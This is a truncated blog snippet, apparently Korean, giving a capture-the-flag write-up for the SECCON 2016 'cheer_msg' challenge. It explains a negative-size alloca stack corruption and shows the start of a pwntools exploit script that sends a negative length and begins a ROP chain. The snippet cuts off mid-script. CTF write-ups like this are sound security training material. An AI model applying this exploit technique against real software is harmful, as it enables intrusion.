SECCON 2016 cheer_msg 요약: alloca 에 음수줘서 stack 해꼬질함.summary: negative index to alloca() and fuckup the stack. from pwn import *context.arch = 'i386'# i386 / arm # recvuntil sendline, pack, recv, sendr = remote('cheermsg.pwn.seccon.jp', 30527)#r = process(['./cheer_msg'])raw_input('attach')# start pwn. print r.recvuntil('Message Length >> ')r.sendline('-144')print r.recvuntil('Name >> ') # ROP start!pr = 0x80487afgot =.. 더보기 이전 1 2 3 4 5 6 7 ··· 423 다음